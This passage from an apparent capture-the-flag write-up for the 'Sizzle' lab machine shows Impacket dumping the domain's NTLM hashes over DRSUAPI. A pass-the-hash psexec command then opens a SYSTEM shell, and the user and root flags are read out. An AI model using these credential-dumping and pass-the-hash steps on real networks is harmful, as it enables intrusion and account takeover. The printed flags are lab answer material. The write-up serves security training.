Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:1797d4bb27f59619665045685d5bb21a:::
[*] Kerberos keys grabbed
[*] Cleaning up...
As we have the NTLM hash of the Administrator user, we can pass the hash and get a shell as nt authority\system. Then all we have to do is reap the harvest and take both the user and root flags.
impacket-psexec htb.local/administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file ftRDykyJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service zRZi on 10.10.10.103.....
[*] Starting service zRZi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type \users\mrlky\desktop\user.txt
168224d790f5c7ef7113300aeceb7e9d
C:\Windows\system32> type \users\administrator\desktop\root.txt
83db2d37e4884fb0beadde14a9d025b7